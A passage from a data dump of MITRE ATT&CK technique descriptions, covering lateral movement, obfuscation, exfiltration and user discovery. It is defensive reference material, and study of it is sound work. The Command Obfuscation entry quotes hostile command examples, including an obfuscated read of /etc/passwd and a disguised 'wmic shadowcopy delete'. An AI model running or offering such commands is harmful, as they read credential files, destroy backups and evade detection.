                              'them to move laterally throughout a network. Linux and macOS implementations of SMB '
                              'typically use Samba.\n'
                              '\n'
                              'Windows systems have hidden network shares that are accessible only to administrators '
                              'and provide the ability for remote file copy and other administrative functions. '
                              'Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this '
                              'technique in conjunction with administrator-level [Valid '
                              'Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked '
                              'system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems '
                              'using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run '
                              'transferred binaries through remote Execution. Example execution techniques that rely '
                              'on authenticated sessions over SMB/RPC are [Scheduled '
                              'Task/Job](https://attack.mitre.org/techniques/T1053), [Service '
                              'Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management '
                              'Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use '
                              'NTLM hashes to access administrator shares on systems with [Pass the '
                              'Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and '
                              'patch levels.(Citation: Microsoft Admin Shares)',
               'name': 'SMB/Windows Admin Shares',
               'platforms': ['Windows']},
 'T1021.003': {'attack_id': 'T1021.003',
               'categories': ['lateral-movement'],
               'description': 'Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to '
                              'interact with remote machines by taking advantage of Distributed Component Object Model '
                              '(DCOM). The adversary may then perform actions as the logged-on user.\n'
                              '\n'
                              'The Windows Component Object Model (COM) is a component of the native Windows '
                              'application programming interface (API) that enables interaction between software '
                              'objects, or executable code that implements one or more interfaces. Through COM, a '
                              'client object can call methods of server objects, which are typically Dynamic Link '
                              'Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware '
                              'that extends the functionality of COM beyond a local computer using remote procedure '
                              'call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft '
                              'COM)\n'
                              '\n'
                              'Permissions to interact with local and remote server COM objects are specified by '
                              'access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) '
                              'By default, only Administrators may remotely activate and launch COM objects through '
                              'DCOM.(Citation: Microsoft COM ACL)\n'
                              '\n'
                              'Through DCOM, adversaries operating in the context of an appropriately privileged user '
                              'can remotely obtain arbitrary and even direct shellcode execution through Office '
                              'applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other '
                              'Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan '
                              '2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in '
                              'existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic '
                              'Data Exchange](https://attack.mitre.org/techniques/T1559/002) (DDE) execution directly '
                              'through a COM created instance of a Microsoft Office application(Citation: Cyberreason '
                              'DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document. DCOM '
                              'can be used as a method of remotely interacting with [Windows Management '
                              'Instrumentation](https://attack.mitre.org/techniques/T1047). (Citation: MSDN WMI)',
               'name': 'Distributed Component Object Model',
               'platforms': ['Windows']},
 'T1021.004': {'attack_id': 'T1021.004',
               'categories': ['lateral-movement'],
               'description': 'Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log '
                              'into remote machines using Secure Shell (SSH). The adversary may then perform actions '
                              'as the logged-on user.\n'
                              '\n'
                              'SSH is a protocol that allows authorized users to open remote shells on other '
                              'computers. Many Linux and macOS versions come with SSH installed by default, although '
                              'typically disabled until the user enables it. The SSH server can be configured to use '
                              'standard password authentication or public-private keypairs in lieu of or in addition '
                              'to a password. In this authentication scenario, the user’s public key must be in a '
                              'special file on the computer running the server that lists which keypairs are allowed '
                              'to login as that user.',
               'name': 'SSH',
               'platforms': ['Linux', 'macOS']},
 'T1021.005': {'attack_id': 'T1021.005',
               'categories': ['lateral-movement'],
               'description': 'Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to '
                              'remotely control machines using Virtual Network Computing (VNC).  VNC is a '
                              'platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) '
                              'protocol to enable users to remotely control another computer’s display by relaying the '
                              'screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer '
                              'Protocol)\n'
                              '\n'
                              'VNC differs from [Remote Desktop '
                              'Protocol](https://attack.mitre.org/techniques/T1021/001) as VNC is screen-sharing '
                              "software rather than resource-sharing software. By default, VNC uses the system's "
                              'authentication, but it can be configured to use credentials specific to VNC.(Citation: '
                              'MacOS VNC software for Remote Desktop)(Citation: VNC Authentication)\n'
                              '\n'
                              'Adversaries may abuse VNC to perform malicious actions as the logged-on user such as '
                              'opening documents, downloading files, and running arbitrary commands. An adversary '
                              'could use VNC to remotely control and monitor a system to collect data and information '
                              'to pivot to other systems within the network. Specific VNC libraries/implementations '
                              'have also been susceptible to brute force attacks and memory usage '
                              'exploitation.(Citation: Hijacking VNC)(Citation: macOS root VNC login without '
                              'authentication)(Citation: VNC Vulnerabilities)(Citation: Offensive Security VNC '
                              'Authentication Check)(Citation: Attacking VNC Servers PentestLab)(Citation: Havana '
                              'authentication bug)',
               'name': 'VNC',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1021.006': {'attack_id': 'T1021.006',
               'categories': ['lateral-movement'],
               'description': 'Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to '
                              'interact with remote systems using Windows Remote Management (WinRM). The adversary may '
                              'then perform actions as the logged-on user.\n'
                              '\n'
                              'WinRM is the name of both a Windows service and a protocol that allows a user to '
                              'interact with a remote system (e.g., run an executable, modify the Registry, modify '
                              'services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by '
                              'any number of programs such as PowerShell.(Citation: Jacobsen 2014) WinRM  can be used '
                              'as a method of remotely interacting with [Windows Management '
                              'Instrumentation](https://attack.mitre.org/techniques/T1047).(Citation: MSDN WMI)',
               'name': 'Windows Remote Management',
               'platforms': ['Windows']},
 'T1021.007': {'attack_id': 'T1021.007',
               'categories': ['lateral-movement'],
               'description': 'Adversaries may log into accessible cloud services within a compromised environment '
                              'using [Valid Accounts](https://attack.mitre.org/techniques/T1078) that are synchronized '
                              'with or federated to on-premises user identities. The adversary may then perform '
                              'management actions or access cloud-hosted resources as the logged-on user. \n'
                              '\n'
                              'Many enterprises federate centrally managed user identities to cloud services, allowing '
                              'users to login with their domain credentials in order to access the cloud control '
                              'plane. Similarly, adversaries may connect to available cloud services through the web '
                              'console or through the cloud command line interface (CLI) (e.g., [Cloud '
                              'API](https://attack.mitre.org/techniques/T1059/009)), using commands such as '
                              '<code>Connect-AZAccount</code> for Azure PowerShell, <code>Connect-MgGraph</code> for '
                              'Microsoft Graph PowerShell, and <code>gcloud auth login</code> for the Google Cloud '
                              'CLI.\n'
                              '\n'
                              'In some cases, adversaries may be able to authenticate to these services via '
                              '[Application Access Token](https://attack.mitre.org/techniques/T1550/001) instead of a '
                              'username and password. ',
               'name': 'Cloud Services',
               'platforms': ['Office 365', 'Azure AD', 'SaaS', 'IaaS', 'Google Workspace']},
 'T1021.008': {'attack_id': 'T1021.008',
               'categories': ['lateral-movement'],
               'description': 'Adversaries may leverage [Valid Accounts](https://attack.mitre.org/techniques/T1078) to '
                              'log directly into accessible cloud hosted compute infrastructure through cloud native '
                              'methods. Many cloud providers offer interactive connections to virtual infrastructure '
                              'that can be accessed through the [Cloud '
                              'API](https://attack.mitre.org/techniques/T1059/009), such as Azure Serial '
                              'Console(Citation: Azure Serial Console), AWS EC2 Instance Connect(Citation: EC2 '
                              'Instance Connect)(Citation: lucr-3: Getting SaaS-y in the cloud), and AWS System '
                              'Manager.(Citation: AWS System Manager).\n'
                              '\n'
                              'Methods of authentication for these connections can include passwords, application '
                              'access tokens, or SSH keys. These cloud native methods may, by default, allow for '
                              'privileged access on the host with SYSTEM or root level access. \n'
                              '\n'
                              'Adversaries may utilize these cloud native methods to directly access virtual '
                              'infrastructure and pivot through an environment.(Citation: SIM Swapping and Abuse of '
                              'the Microsoft Azure Serial Console) These connections typically provide direct console '
                              'access to the VM rather than the execution of scripts (i.e., [Cloud Administration '
                              'Command](https://attack.mitre.org/techniques/T1651)).',
               'name': 'Direct Cloud VM Connections',
               'platforms': ['IaaS']},
 'T1025': {'attack_id': 'T1025',
           'categories': ['collection'],
           'description': 'Adversaries may search connected removable media on computers they have compromised to find '
                          'files of interest. Sensitive data can be collected from any removable media (optical disk '
                          'drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. '
                          'Interactive command shells may be in use, and common functionality within '
                          '[cmd](https://attack.mitre.org/software/S0106) may be used to gather information. \n'
                          '\n'
                          'Some adversaries may also use [Automated '
                          'Collection](https://attack.mitre.org/techniques/T1119) on removable media.',
           'name': 'Data from Removable Media',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1026': {'attack_id': 'T1026',
           'categories': ['command-and-control'],
           'description': '**This technique has been deprecated and should no longer be used.**\n'
                          '\n'
                          'Some adversaries may split communications between different protocols. There could be one '
                          'protocol for inbound command and control and another for outbound data, allowing it to '
                          'bypass certain firewall restrictions. The split could also be random to simply avoid data '
                          'threshold alerts on any one communication.',
           'name': 'Multiband Communication',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1027': {'attack_id': 'T1027',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may attempt to make an executable or file difficult to discover or analyze by '
                          'encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. '
                          'This is common behavior that can be used across different platforms and the network to '
                          'evade defenses. \n'
                          '\n'
                          'Payloads may be compressed, archived, or encrypted in order to avoid detection. These '
                          'payloads may be used during Initial Access or later to mitigate detection. Sometimes a '
                          "user's action may be required to open and [Deobfuscate/Decode Files or "
                          'Information](https://attack.mitre.org/techniques/T1140) for [User '
                          'Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to '
                          'input a password to open a password protected compressed/encrypted file that was provided '
                          'by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use '
                          'compressed or archived scripts, such as JavaScript. \n'
                          '\n'
                          'Portions of files can also be encoded to hide the plain-text strings that would otherwise '
                          'help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) '
                          'Payloads may also be split into separate, seemingly benign files that only reveal malicious '
                          'functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)\n'
                          '\n'
                          'Adversaries may also abuse [Command '
                          'Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands executed '
                          'from payloads or directly via [Command and Scripting '
                          'Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, '
                          'characters, and other platform/language specific semantics can be used to evade signature '
                          'based detections and application control mechanisms. (Citation: FireEye Obfuscation June '
                          '2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand '
                          'March 2017) ',
           'name': 'Obfuscated Files or Information',
           'platforms': ['Linux', 'macOS', 'Windows', 'Network']},
 'T1027.001': {'attack_id': 'T1027.001',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may use binary padding to add junk data and change the on-disk '
                              'representation of malware. This can be done without affecting the functionality or '
                              'behavior of a binary, but can increase the size of the binary beyond what some security '
                              'tools are capable of handling due to file size limitations. \n'
                              '\n'
                              'Binary padding effectively changes the checksum of the file and can also be used to '
                              'avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET '
                              'OceanLotus) The padding used is commonly generated by a function to create junk data '
                              'and then appended to the end or applied to sections of malware.(Citation: Securelist '
                              'Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of '
                              'certain tools and detection capabilities that are not designed or configured to scan '
                              'large files. This may also reduce the likelihood of being collected for analysis. '
                              'Public file scanning services, such as VirusTotal, limits the maximum size of an '
                              'uploaded file to be analyzed.(Citation: VirusTotal FAQ) ',
               'name': 'Binary Padding',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1027.002': {'attack_id': 'T1027.002',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may perform software packing or virtual machine software protection to '
                              'conceal their code. Software packing is a method of compressing or encrypting an '
                              'executable. Packing an executable changes the file signature in an attempt to avoid '
                              'signature-based detection. Most decompression techniques decompress the executable code '
                              "in memory. Virtual machine software protection translates an executable's original code "
                              'into a special format that only a special virtual machine can run. A virtual machine is '
                              'then called to run this code.(Citation: ESET FinFisher Jan 2018) \n'
                              '\n'
                              'Utilities used to perform software packing are called packers. Example packers are '
                              'MPRESS and UPX. A more comprehensive list of known packers is available, but '
                              'adversaries may create their own packing techniques that do not leave the same '
                              'artifacts as well-known packers to evade defenses.(Citation: Awesome Executable '
                              'Packing)  ',
               'name': 'Software Packing',
               'platforms': ['macOS', 'Windows', 'Linux']},
 'T1027.003': {'attack_id': 'T1027.003',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may use steganography techniques in order to prevent the detection of '
                              'hidden information. Steganographic techniques can be used to hide data in digital media '
                              'such as images, audio tracks, video clips, or text files.\n'
                              '\n'
                              '[Duqu](https://attack.mitre.org/software/S0038) was an early example of malware that '
                              "used steganography. It encrypted the gathered information from a victim's system and "
                              'hid it within an image before exfiltrating the image to a C2 server.(Citation: '
                              'Wikipedia Duqu) \n'
                              '\n'
                              'By the end of 2017, a threat group used\u202f<code>Invoke-PSImage</code>\u202fto hide '
                              '[PowerShell](https://attack.mitre.org/techniques/T1059/001) commands in an image file '
                              "(.png) and execute the code on a victim's system. In this particular case the "
                              '[PowerShell](https://attack.mitre.org/techniques/T1059/001) code downloaded another '
                              "obfuscated script to gather intelligence from the victim's machine and communicate it "
                              'back to the adversary.(Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)  ',
               'name': 'Steganography',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1027.004': {'attack_id': 'T1027.004',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may attempt to make payloads difficult to discover and analyze by '
                              'delivering files to victims as uncompiled code. Text-based source code files may '
                              'subvert analysis and scrutiny from protections targeting executables/binaries. These '
                              'payloads will need to be compiled before execution; typically via native utilities such '
                              'as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)\n'
                              '\n'
                              'Source code payloads may also be encrypted, encoded, and/or embedded within other '
                              'files, such as those delivered as a '
                              '[Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered '
                              'in formats unrecognizable and inherently benign to the native OS (ex: EXEs on '
                              'macOS/Linux) before later being (re)compiled into a proper executable binary with a '
                              'bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)',
               'name': 'Compile After Delivery',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1027.005': {'attack_id': 'T1027.005',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may remove indicators from tools if they believe their malicious tool was '
                              'detected, quarantined, or otherwise curtailed. They can modify the tool by removing the '
                              "indicator and using the updated version that is no longer detected by the target's "
                              'defensive systems or subsequent targets that may use similar systems.\n'
                              '\n'
                              'A good example of this is when malware is detected with a file signature and '
                              'quarantined by anti-virus software. An adversary who can determine that the malware was '
                              'quarantined because of its file signature may modify the file to explicitly avoid that '
                              'signature, and then re-use the malware.',
               'name': 'Indicator Removal from Tools',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1027.006': {'attack_id': 'T1027.006',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may smuggle data and files past content filters by hiding malicious '
                              'payloads inside of seemingly benign HTML files. HTML documents can store large binary '
                              'objects known as JavaScript Blobs (immutable data that represents raw bytes) that can '
                              'later be constructed into file-like objects. Data may also be stored in Data URLs, '
                              'which enable embedding media type or MIME files inline of HTML documents. HTML5 also '
                              'introduced a download attribute that may be used to initiate file downloads.(Citation: '
                              'HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)\n'
                              '\n'
                              'Adversaries may deliver payloads to victims that bypass security controls through HTML '
                              'Smuggling by abusing JavaScript Blobs and/or HTML5 download attributes. Security '
                              'controls such as web content filters may not identify smuggled malicious files inside '
                              'of HTML/JS files, as the content may be based on typically benign MIME types such as '
                              '<code>text/plain</code> and/or <code>text/html</code>. Malicious files or data can be '
                              'obfuscated and hidden inside of HTML files through Data URLs and/or JavaScript Blobs '
                              'and can be deobfuscated when they reach the victim (i.e. [Deobfuscate/Decode Files or '
                              'Information](https://attack.mitre.org/techniques/T1140)), potentially bypassing content '
                              'filters.\n'
                              '\n'
                              'For example, JavaScript Blobs can be abused to dynamically generate malicious files in '
                              'the victim machine and may be dropped to disk by abusing JavaScript functions such as '
                              '<code>msSaveBlob</code>.(Citation: HTML Smuggling Menlo Security 2020)(Citation: MSTIC '
                              'NOBELIUM May 2021)(Citation: Outlflank HTML Smuggling 2018)(Citation: nccgroup '
                              'Smuggling HTA 2017)',
               'name': 'HTML Smuggling',
               'platforms': ['Windows', 'Linux', 'macOS']},
 'T1027.007': {'attack_id': 'T1027.007',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may obfuscate then dynamically resolve API functions called by their '
                              'malware in order to conceal malicious functionalities and impair defensive analysis. '
                              'Malware commonly uses various [Native API](https://attack.mitre.org/techniques/T1106) '
                              'functions provided by the OS to perform various tasks such as those involving '
                              'processes, files, and other system artifacts.\n'
                              '\n'
                              'API functions called by malware may leave static artifacts such as strings in payload '
                              'files. Defensive analysts may also uncover which functions a binary file may execute '
                              'via an import address table (IAT) or other structures that help dynamically link '
                              'calling code to the shared modules that provide functions.(Citation: Huntress API '
                              'Hash)(Citation: IRED API Hashing)\n'
                              '\n'
                              'To avoid static or other defensive analysis, adversaries may use dynamic API resolution '
                              'to conceal malware characteristics and functionalities. Similar to [Software '
                              'Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may '
                              'change file signatures and obfuscate malicious API function calls until they are '
                              'resolved and invoked during runtime.\n'
                              '\n'
                              'Various methods may be used to obfuscate malware calls to API functions. For example, '
                              'hashes of function names are commonly stored in malware in lieu of literal strings. '
                              'Malware can use these hashes (or other identifiers) to manually reproduce the linking '
                              'and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. '
                              'These hashes/identifiers can also be further obfuscated using encryption or other '
                              'string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or '
                              'Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: '
                              'BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)',
               'name': 'Dynamic API Resolution',
               'platforms': ['Windows']},
 'T1027.008': {'attack_id': 'T1027.008',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may attempt to make a payload difficult to analyze by removing symbols, '
                              'strings, and other human readable information. Scripts and executables may contain '
                              'variables names and other strings that help developers document code functionality. '
                              'Symbols are often created by an operating system’s `linker` when executable payloads '
                              'are compiled. Reverse engineers use these symbols and strings to analyze code and to '
                              'identify functionality in payloads.(Citation: Mandiant golang stripped binaries '
                              'explanation)(Citation: intezer stripped binaries elf files 2018)\n'
                              '\n'
                              'Adversaries may use stripped payloads in order to make malware analysis more difficult. '
                              'For example, compilers and other tools may provide features to remove or obfuscate '
                              'strings and symbols. Adversaries have also used stripped payload formats, such as '
                              'run-only AppleScripts, a compiled and stripped version of '
                              '[AppleScript](https://attack.mitre.org/techniques/T1059/002), to evade detection and '
                              'analysis. The lack of human-readable information may directly hinder detection and '
                              'analysis of payloads.(Citation: SentinelLabs reversing run-only applescripts 2021)',
               'name': 'Stripped Payloads',
               'platforms': ['macOS', 'Linux', 'Windows', 'Network']},
 'T1027.009': {'attack_id': 'T1027.009',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may embed payloads within other files to conceal malicious content from '
                              'defenses. Otherwise seemingly benign files (such as scripts and executables) may be '
                              'abused to carry and obfuscate malicious payloads and content. In some cases, embedded '
                              'payloads may also enable adversaries to [Subvert Trust '
                              'Controls](https://attack.mitre.org/techniques/T1553) by not impacting execution '
                              'controls such as digital signatures and notarization tickets.(Citation: Sentinel '
                              'Labs) \n'
                              '\n'
                              'Adversaries may embed payloads in various file formats to hide payloads.(Citation: '
                              'Microsoft Learn) This is similar to '
                              '[Steganography](https://attack.mitre.org/techniques/T1027/003), though does not involve '
                              'weaving malicious content into specific bytes and patterns related to legitimate '
                              'digital media formats.(Citation: GitHub PSImage) \n'
                              '\n'
                              'For example, adversaries have been observed embedding payloads within or as an overlay '
                              'of an otherwise benign binary.(Citation: Securelist Dtrack2) Adversaries have also been '
                              'observed nesting payloads (such as executables and run-only scripts) inside a file of '
                              'the same format.(Citation: SentinelLabs reversing run-only applescripts 2021) \n'
                              '\n'
                              'Embedded content may also be used as [Process '
                              'Injection](https://attack.mitre.org/techniques/T1055) payloads used to infect benign '
                              'system processes.(Citation: Trend Micro) These embedded then injected payloads may be '
                              'used as part of the modules of malware designed to provide specific features such as '
                              'encrypting C2 communications in support of an orchestrator module. For example, an '
                              'embedded module may be injected into default browsers, allowing adversaries to then '
                              'communicate via the network.(Citation: Malware Analysis Report ComRAT)',
               'name': 'Embedded Payloads',
               'platforms': ['macOS', 'Windows', 'Linux']},
 'T1027.010': {'attack_id': 'T1027.010',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may obfuscate content during command execution to impede detection. '
                              'Command-line obfuscation is a method of making strings and patterns within commands and '
                              'scripts more difficult to signature and analyze. This type of obfuscation can be '
                              'included within commands executed by delivered payloads (e.g., '
                              '[Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by '
                              'Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command '
                              'and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai '
                              'JS)(Citation: Malware Monday VBE)\n'
                              '\n'
                              'For example, adversaries may abuse syntax that utilizes various symbols and escape '
                              'characters (such as spacing,  `^`, `+`. `$`, and `%`) to make commands difficult to '
                              'analyze while maintaining the same intended functionality.(Citation: RC PowerShell) '
                              'Many languages support built-in obfuscation in the form of base64 or URL '
                              'encoding.(Citation: Microsoft PowerShellB64) Adversaries may also manually implement '
                              'command obfuscation via string splitting (`“Wor”+“d.Application”`), order and casing of '
                              "characters (`rev <<<'dwssap/cte/ tac'`), globing (`mkdir -p '/tmp/:&$NiA'`), as well as "
                              'various tricks involving passing strings through tokens/environment variables/input '
                              'streams.(Citation: Bashfuscator Command Obfuscators)(Citation: FireEye Obfuscation June '
                              '2017)\n'
                              '\n'
                              'Adversaries may also use tricks such as directory traversals to obfuscate references to '
                              'the binary being invoked by a command '
                              '(`C:\\voi\\pcw\\..\\..\\Windows\\tei\\qs\\k\\..\\..\\..\\system32\\erool\\..\\wbem\\wg\\je\\..\\..\\wmic.exe '
                              'shadowcopy delete`).(Citation: Twitter Richard WMIC)\n'
                              '\n'
                              'Tools such as <code>Invoke-Obfuscation</code> and <code>Invoke-DOSfucation</code> have '
                              'also been used to obfuscate commands.(Citation: Invoke-DOSfuscation)(Citation: '
                              'Invoke-Obfuscation)',
               'name': 'Command Obfuscation',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1027.011': {'attack_id': 'T1027.011',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may store data in "fileless" formats to conceal malicious activity from '
                              'defenses. Fileless storage can be broadly defined as any format other than a file. '
                              'Common examples of non-volatile fileless storage include the Windows Registry, event '
                              'logs, or WMI repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless)\n'
                              '\n'
                              'Similar to fileless in-memory behaviors such as [Reflective Code '
                              'Loading](https://attack.mitre.org/techniques/T1620) and [Process '
                              'Injection](https://attack.mitre.org/techniques/T1055), fileless data storage may remain '
                              'undetected by anti-virus and other endpoint security tools that can only access '
                              'specific file formats from disk storage.\n'
                              '\n'
                              'Adversaries may use fileless storage to conceal various types of stored data, including '
                              'payloads/shellcode (potentially being used as part of '
                              '[Persistence](https://attack.mitre.org/tactics/TA0003)) and collected data not yet '
                              'exfiltrated from the victim (e.g., [Local Data '
                              'Staging](https://attack.mitre.org/techniques/T1074/001)). Adversaries also often '
                              'encrypt, encode, splice, or otherwise obfuscate this fileless data when stored.\n'
                              '\n'
                              'Some forms of fileless storage activity may indirectly create artifacts in the file '
                              'system, but in central and otherwise difficult to inspect formats such as the WMI '
                              '(e.g., `%SystemRoot%\\System32\\Wbem\\Repository`) or Registry (e.g., '
                              '`%SystemRoot%\\System32\\Config`) physical files.(Citation: Microsoft Fileless) ',
               'name': 'Fileless Storage',
               'platforms': ['Windows']},
 'T1027.012': {'attack_id': 'T1027.012',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may smuggle commands to download malicious payloads past content filters by '
                              'hiding them within otherwise seemingly benign windows shortcut files. Windows shortcut '
                              'files (.LNK) include many metadata fields, including an icon location field (also known '
                              'as the `IconEnvironmentDataBlock`) designed to specify the path to an icon file that is '
                              'to be displayed for the LNK file within a host directory. \n'
                              '\n'
                              'Adversaries may abuse this LNK metadata to download malicious payloads. For example, '
                              'adversaries have been observed using LNK files as phishing payloads to deliver malware. '
                              'Once invoked (e.g., [Malicious File](https://attack.mitre.org/techniques/T1204/002)), '
                              'payloads referenced via external URLs within the LNK icon location field may be '
                              'downloaded. These files may also then be invoked by [Command and Scripting '
                              'Interpreter](https://attack.mitre.org/techniques/T1059)/[System Binary Proxy '
                              'Execution](https://attack.mitre.org/techniques/T1218) arguments within the target path '
                              'field of the LNK.(Citation: Unprotect Shortcut)(Citation: Booby Trap Shortcut 2017)\n'
                              '\n'
                              'LNK Icon Smuggling may also be utilized post compromise, such as malicious scripts '
                              'executing an LNK on an infected host to download additional malicious payloads. \n',
               'name': 'LNK Icon Smuggling',
               'platforms': ['Windows']},
 'T1027.013': {'attack_id': 'T1027.013',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may encrypt or encode files to obfuscate strings, bytes, and other specific '
                              'patterns to impede detection. Encrypting and/or encoding file content aims to conceal '
                              'malicious artifacts within a file used in an intrusion. Many other techniques, such as '
                              '[Software Packing](https://attack.mitre.org/techniques/T1027/002), '
                              '[Steganography](https://attack.mitre.org/techniques/T1027/003), and [Embedded '
                              'Payloads](https://attack.mitre.org/techniques/T1027/009), share this same broad '
                              'objective. Encrypting and/or encoding files could lead to a lapse in detection of '
                              'static signatures, only for this malicious content to be revealed (i.e., '
                              '[Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)) '
                              'at the time of execution/use.\n'
                              '\n'
                              'This type of file obfuscation can be applied to many file artifacts present on victim '
                              'hosts, such as malware log/configuration and payload files.(Citation: File obfuscation) '
                              'Files can be encrypted with a hardcoded or user-supplied key, as well as otherwise '
                              'obfuscated using standard encoding/compression schemes such as Base64.\n'
                              '\n'
                              'The entire content of a file may be obfuscated, or just specific functions or values '
                              '(such as C2 addresses). Encryption and encoding may also be applied in redundant layers '
                              'for additional protection.\n'
                              '\n'
                              'For example, adversaries may abuse password-protected Word documents or self-extracting '
                              '(SFX) archives as a method of encrypting/encoding a file such as a '
                              '[Phishing](https://attack.mitre.org/techniques/T1566) payload. These files typically '
                              'function by attaching the intended archived content to a decompressor stub that is '
                              'executed when the file is invoked (e.g., [User '
                              'Execution](https://attack.mitre.org/techniques/T1204)).(Citation: SFX - '
                              'Encrypted/Encoded File) \n'
                              '\n'
                              'Adversaries may also abuse file-specific as well as custom encoding schemes. For '
                              'example, Byte Order Mark (BOM) headers in text files may be abused to manipulate and '
                              'obfuscate file content until [Command and Scripting '
                              'Interpreter](https://attack.mitre.org/techniques/T1059) execution.',
               'name': 'Encrypted/Encoded File',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1029': {'attack_id': 'T1029',
           'categories': ['exfiltration'],
           'description': 'Adversaries may schedule data exfiltration to be performed only at certain times of day or '
                          'at certain intervals. This could be done to blend traffic patterns with normal activity or '
                          'availability.\n'
                          '\n'
                          'When scheduled exfiltration is used, other exfiltration techniques likely apply as well to '
                          'transfer the information out of the network, such as [Exfiltration Over C2 '
                          'Channel](https://attack.mitre.org/techniques/T1041) or [Exfiltration Over Alternative '
                          'Protocol](https://attack.mitre.org/techniques/T1048).',
           'name': 'Scheduled Transfer',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1030': {'attack_id': 'T1030',
           'categories': ['exfiltration'],
           'description': 'An adversary may exfiltrate data in fixed size chunks instead of whole files or limit '
                          'packet sizes below certain thresholds. This approach may be used to avoid triggering '
                          'network data transfer threshold alerts.',
           'name': 'Data Transfer Size Limits',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1033': {'attack_id': 'T1033',
           'categories': ['discovery'],
           'description': 'Adversaries may attempt to identify the primary user, currently logged in user, set of '
                          'users that commonly uses a system, or whether a user is actively using the system. They may '
                          'do this, for example, by retrieving account usernames or by using [OS Credential '
                          'Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a '
                          'number of different ways using other Discovery techniques, because user and username '
                          'details are prevalent throughout a system and include running process ownership, '
                          'file/directory ownership, session information, and system logs. Adversaries may use the '
                          'information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) '
                          'during automated discovery to shape follow-on behaviors, including whether or not the '
                          'adversary fully infects the target and/or attempts specific actions.\n'
                          '\n'
                          'Various utilities and commands may acquire this information, including <code>whoami</code>. '
                          'In macOS and Linux, the currently logged in user can be identified with <code>w</code> and '
                          "<code>who</code>. On macOS the <code>dscl . list /Users | grep -v '_'</code> command can "
                          'also be used to enumerate user accounts. Environment variables, such as '
                          '<code>%USERNAME%</code> and <code>$USER</code>, may also be used to access this '
                          'information.\n'
                          '\n'
                          'On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) '
                          'commands such as `show users` and `show ssh` can be used to display users currently logged '
                          'into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network '
                          'Infrastructure Devices 2018)',
           'name': 'System Owner/User Discovery',
           'platforms': ['Linux', 'macOS', 'Windows', 'Network']},
 'T1034': {'attack_id': 'T1034',
